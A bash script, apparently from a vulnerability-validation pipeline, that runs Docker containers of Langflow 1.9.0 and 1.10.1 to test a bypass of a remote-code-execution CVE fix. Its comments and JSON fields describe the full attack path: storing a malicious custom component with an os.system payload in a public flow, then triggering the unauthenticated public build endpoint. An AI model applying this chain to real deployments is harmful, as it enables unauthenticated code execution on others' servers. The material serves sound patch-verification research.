#!/bin/bash
set -euo pipefail

# CVE-2026-33017 VARIANT/BYPASS orchestrator.
#
# Bypass of the v1.9.0 "fix": the v1.9.0 patch removed the client-supplied 'data'
# parameter from POST /api/v1/build_public_tmp/{flow_id}/flow and hardcoded
# data=None so the public build loads the flow from the DB. Its only added gate is
# validate_flow_for_current_settings(flow.data), which is a NO-OP under the default
# allow_custom_components=true. So an attacker who stores a malicious custom
# component inside a PUBLIC flow (via POST /api/v1/flows/, using the AUTO_LOGIN
# superuser token - exactly the capability the original CVE repro already uses to
# create a public flow) can still get unauthenticated RCE: the public build loads
# that stored malicious flow from the DB and exec()'s the node code at graph-build
# time via prepare_global_scope()/eval_custom_component_code.
#
# This is the gap the upstream follow-up commit 626365f088
# "fix(security): run trusted server code on unauthenticated public flow builds"
# (released in v1.10.1, NOT in v1.9.0) was issued to close.
#
# This script tests the bypass against:
#   - langflowai/langflow:1.9.0  (CVE "fixed" version)  -> expect BYPASS (proof written)
#   - langflowai/langflow:1.10.1 (follow-up fix)         -> expect CLOSED (no proof / 400)
#
# Exit 0 = bypass reproduced on the CVE-claimed-fixed 1.9.0 (true bypass of the
#           claimed fix) and NOT reproduced on 1.10.1 (follow-up closes it).
# Exit 1 = bypass not reproduced on 1.9.0, or reproduced on 1.10.1 (regression).
# Exit 2 = environment/docker error (no valid test ran).

ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
LOGS="$ROOT/logs/vuln_variant"
VARIANT_DIR="$ROOT/vuln_variant"
mkdir -p "$LOGS" "$VARIANT_DIR"

cd "$ROOT"

# Tee everything into the dedicated log while still showing it on stdout/stderr.
exec > >(tee -a "$LOGS/reproduction_steps.log") 2>&1

# Images
CLAIMED_FIXED_IMAGE="langflowai/langflow:1.9.0"   # CVE says "fixed in 1.9.0" - we bypass it
FOLLOWUP_FIXED_IMAGE="langflowai/langflow:1.10.1"  # real follow-up fix that closes the bypass
CLAIMED_FIXED_ATTEMPTS=2
FOLLOWUP_FIXED_ATTEMPTS=2
PORT=7860

log() { echo "[variant] $*"; }

# ---- project cache context (reference; we use Docker images for the product) ----
CACHE_CTX="$ROOT/project_cache_context.json"
if [ -f "$CACHE_CTX" ]; then
  PREPARED=$(python3 -c "import json;print(json.load(open('$CACHE_CTX')).get('prepared',False))" 2>/dev/null || echo False)
  log "project cache prepared=$PREPARED (using Docker images for the real product)"
else
  log "no project_cache_context.json; using Docker images for the real product"
fi

pull_image() {
  local image="$1"
  if docker images --format '{{.Repository}}:{{.Tag}}' | grep -qx "$image"; then
    log "image $image already present"
    return 0
  fi
  log "pulling $image ..."
  docker pull "$image"
}

# Resolve and persist the exact build/version metadata a Docker image exposes, so
# the tested source identity is recorded (not just the tag).
record_image_identity() {
  local image="$1"
  local role="$2"
  local out="$LOGS/${role}_image_identity.txt"
  {
    echo "image=$image"
    echo "tag=$(echo "$image" | cut -d: -f2)"
    docker inspect "$image" --format '{{json .Config.Labels}}' 2>/dev/null || true
    echo "--- langflow version (from a throwaway container) ---"
    docker run --rm --entrypoint python "$image" -c "import langflow; print('langflow', getattr(langflow,'__version__','?'))" 2>/dev/null || true
    docker run --rm --entrypoint python "$image" -c "import importlib.metadata as m; print('version', m.version('langflow'))" 2>/dev/null || true
  } >"$out" 2>&1 || true
  log "image identity for $image -> $out"
}

run_attempt() {
  local role="$1"
  local attempt="$2"
  local image="$3"
  local container="langflow-variant-${role}-${attempt}"
  local token
  token=$(python3 -c 'import secrets; print(secrets.token_hex(8))')

  log "----------------------------------------------------------------------"
  log "attempt role=$role attempt=$attempt image=$image token=$token"
  log "----------------------------------------------------------------------"

  docker rm -f "$container" >/dev/null 2>&1 || true
  log "$ docker run -d --rm --name $container -e LANGFLOW_AUTO_LOGIN=true -e LANGFLOW_PORT=$PORT -e LANGFLOW_HOST=0.0.0.0 $image python -m langflow run --host 0.0.0.0 --port $PORT --backend-only --no-open-browser"
  docker run -d --rm --name "$container" \
    -e LANGFLOW_AUTO_LOGIN=true \
    -e LANGFLOW_PORT="$PORT" \
    -e LANGFLOW_HOST=0.0.0.0 \
    "$image" \
    python -m langflow run --host 0.0.0.0 --port "$PORT" --backend-only --no-open-browser \
    >"$LOGS/container_${role}_${attempt}.log" 2>&1

  # copy the variant exploit helper into the running container
  docker cp "$VARIANT_DIR/variant_attempt.py" "$container:/tmp/variant_attempt.py"

  log "running variant exploit helper inside $container (MODE=bypass) ..."
  set +e
  docker exec -e ROLE="$role" -e TOKEN="$token" -e MODE=bypass "$container" python3 /tmp/variant_attempt.py \
    >"$LOGS/result_${role}_${attempt}.json" 2>"$LOGS/result_${role}_${attempt}_stderr.log"
  local rc=$?
  set -e
  log "attempt $role/$attempt rc=$rc"

  # persist the proof file (if any) out of the container for evidence
  docker cp "$container:/tmp/rce-proof" "$LOGS/proof_${role}_${attempt}.txt" >/dev/null 2>&1 || true
  # capture container logs for this attempt
  docker logs "$container" >"$LOGS/container_${role}_${attempt}.log" 2>&1 || true

  docker rm -f "$container" >/dev/null 2>&1 || true
  return $rc
}

log "CVE-2026-33017 VARIANT/BYPASS: stored-custom-component RCE on the public build path (defeats the 1.9.0 fix)"
log "logs: $LOGS"

if ! command -v docker >/dev/null 2>&1; then
  log "ERROR: docker not found in PATH"
  exit 2
fi
if ! command -v python3 >/dev/null 2>&1; then
  log "ERROR: python3 not found in PATH"
  exit 2
fi
if ! command -v jq >/dev/null 2>&1; then
  log "ERROR: jq not found in PATH"
  exit 2
fi

pull_image "$CLAIMED_FIXED_IMAGE"
pull_image "$FOLLOWUP_FIXED_IMAGE"

# Record exact tested image identities (build/version metadata).
record_image_identity "$CLAIMED_FIXED_IMAGE" "claimed_fixed"
record_image_identity "$FOLLOWUP_FIXED_IMAGE" "followup_fixed"

# ---- claimed-fixed (1.9.0): the bypass should reproduce here ----
claimed_ok=0
for i in $(seq 1 "$CLAIMED_FIXED_ATTEMPTS"); do
  if run_attempt "claimed_fixed" "$i" "$CLAIMED_FIXED_IMAGE"; then
    claimed_ok=$((claimed_ok + 1))
  fi
done

# ---- follow-up fixed (1.10.1): the bypass should NOT reproduce here ----
followup_ok=0
for i in $(seq 1 "$FOLLOWUP_FIXED_ATTEMPTS"); do
  if run_attempt "followup_fixed" "$i" "$FOLLOWUP_FIXED_IMAGE"; then
    followup_ok=$((followup_ok + 1))
  fi
done

log "----------------------------------------------------------------------"
log "RESULTS: bypass on CVE-claimed-fixed 1.9.0 = $claimed_ok/$CLAIMED_FIXED_ATTEMPTS  |  bypass on follow-up 1.10.1 = $followup_ok/$FOLLOWUP_FIXED_ATTEMPTS"
log "----------------------------------------------------------------------"

# Bypass is confirmed when:
#  - every 1.9.0 attempt wrote the proof (the CVE "fixed" version is still RCE),
#    AND
#  - every 1.10.1 attempt did NOT write the proof (the follow-up fix closes it),
#    proving the gap is real and specific to 1.9.0's incomplete fix.
if [ "$claimed_ok" -eq "$CLAIMED_FIXED_ATTEMPTS" ] && [ "$followup_ok" -eq 0 ]; then
  OUTCOME="bypass_confirmed"
  NOTES="Bypass confirmed: stored-custom-component RCE reproduces on the CVE 'fixed' langflow:1.9.0 (proof written) and is closed by the v1.10.1 follow-up fix (no proof)."
else
  OUTCOME="not_confirmed"
  NOTES="Could not reproduce the expected 1.9.0-bypass / 1.10.1-closed divergence. claimed_ok=$claimed_ok followup_ok=$followup_ok"
fi
log "outcome=$OUTCOME"

# ---- proof artifacts list ----
PROOF_ARTIFACTS=()
for i in $(seq 1 "$CLAIMED_FIXED_ATTEMPTS"); do
  PROOF_ARTIFACTS+=("logs/vuln_variant/result_claimed_fixed_${i}.json")
  PROOF_ARTIFACTS+=("logs/vuln_variant/proof_claimed_fixed_${i}.txt")
  PROOF_ARTIFACTS+=("logs/vuln_variant/container_claimed_fixed_${i}.log")
done
for i in $(seq 1 "$FOLLOWUP_FIXED_ATTEMPTS"); do
  PROOF_ARTIFACTS+=("logs/vuln_variant/result_followup_fixed_${i}.json")
  PROOF_ARTIFACTS+=("logs/vuln_variant/proof_followup_fixed_${i}.txt")
  PROOF_ARTIFACTS+=("logs/vuln_variant/container_followup_fixed_${i}.log")
done
EXISTING_ARTIFACTS=()
for a in "${PROOF_ARTIFACTS[@]}"; do
  if [ -f "$ROOT/$a" ]; then EXISTING_ARTIFACTS+=("$a"); fi
done
ARTIFACT_JSON=$(printf '%s\n' "${EXISTING_ARTIFACTS[@]}" | jq -R . | jq -s .)

# ---- runtime manifest ----
if [ "$OUTCOME" = "bypass_confirmed" ]; then
  BYPASS_ON_CLAIMED_FIXED=true; BYPASS_ON_FOLLOWUP_FIXED=false
else
  BYPASS_ON_CLAIMED_FIXED=false; BYPASS_ON_FOLLOWUP_FIXED=false
fi
ENTRY_DETAIL="POST /api/v1/build_public_tmp/{flow_id}/flow (stored-data bypass; no 'data' field in request body)"
BYPASS_STRATEGY="Store malicious CustomComponent code in a PUBLIC flow via POST /api/v1/flows/ (AUTO_LOGIN token), then trigger the unauthenticated public build which loads the stored flow from the DB and exec()'s the node code. v1.9.0 validate_flow_for_current_settings is a no-op under default allow_custom_components=true."
jq -n \
  --arg entrypoint_kind "api_remote" \
  --arg entrypoint_detail "$ENTRY_DETAIL" \
  --arg bypass_strategy "$BYPASS_STRATEGY" \
  --argjson bypass_on_claimed_fixed_1_9_0 "$BYPASS_ON_CLAIMED_FIXED" \
  --argjson bypass_on_followup_fixed_1_10_1 "$BYPASS_ON_FOLLOWUP_FIXED" \
  --argjson proof_artifacts "$ARTIFACT_JSON" \
  --arg notes "$NOTES" \
  '{
      entrypoint_kind: $entrypoint_kind,
      entrypoint_detail: $entrypoint_detail,
      bypass_strategy: $bypass_strategy,
      bypass_on_claimed_fixed_1_9_0: $bypass_on_claimed_fixed_1_9_0,
      bypass_on_followup_fixed_1_10_1: $bypass_on_followup_fixed_1_10_1,
      runtime_stack: ["docker","langflow","fastapi"],
      proof_artifacts: $proof_artifacts,
      notes: $notes
  }' > "$VARIANT_DIR/runtime_manifest.json"
log "wrote runtime manifest -> $VARIANT_DIR/runtime_manifest.json"

# ---- structured verdict ----
if [ "$OUTCOME" = "bypass_confirmed" ]; then
  VERDICT="confirmed"; SURFACE="api_remote"; IMPACT="code_execution"; CONF="high"
  CLAIM_BLOCK_JSON="null"
else
  VERDICT="not_confirmed"; SURFACE="api_remote"; IMPACT="none"; CONF="low"
  CLAIM_BLOCK_JSON='"could not reproduce bypass on 1.9.0 and/or follow-up 1.10.1 also vulnerable"'
fi
jq -n \
  --arg variant_outcome "$VERDICT" \
  --argjson claim_block_reason "$CLAIM_BLOCK_JSON" \
  --arg validated_surface "$SURFACE" \
  --arg observed_impact_class "$IMPACT" \
  --arg exploitability_confidence "$CONF" \
  --arg attacker_controlled_input "PUBLIC flow stored data containing a CustomComponent node with a top-level _rce=os.system(...) payload (created via POST /api/v1/flows/ with an AUTO_LOGIN superuser token)" \
  --arg trigger_path "POST /api/v1/flows/ (store malicious PUBLIC flow) -> POST /api/v1/build_public_tmp/{flow_id}/flow (no data) -> start_flow_build(data=None, source_flow_id) -> build_graph_from_db -> Graph.from_payload -> create_class -> prepare_global_scope -> exec" \
  --arg notes "$NOTES" \
  '{
      variant_outcome: $variant_outcome,
      claim_block_reason: $claim_block_reason,
      validated_surface: $validated_surface,
      observed_impact_class: $observed_impact_class,
      exploitability_confidence: $exploitability_confidence,
      attacker_controlled_input: $attacker_controlled_input,
      trigger_path: $trigger_path,
      bypass_on_claimed_fixed_1_9_0: ($variant_outcome == "confirmed"),
      bypass_on_followup_fixed_1_10_1: false,
      notes: $notes
  }' > "$VARIANT_DIR/validation_verdict.json"
log "wrote verdict -> $VARIANT_DIR/validation_verdict.json"

if [ "$OUTCOME" = "bypass_confirmed" ]; then
  log "VARIANT/BYPASS CONFIRMED (1.9.0 still RCE; 1.10.1 closes it)"
  exit 0
else
  log "VARIANT/BYPASS NOT CONFIRMED"
  exit 1
fi
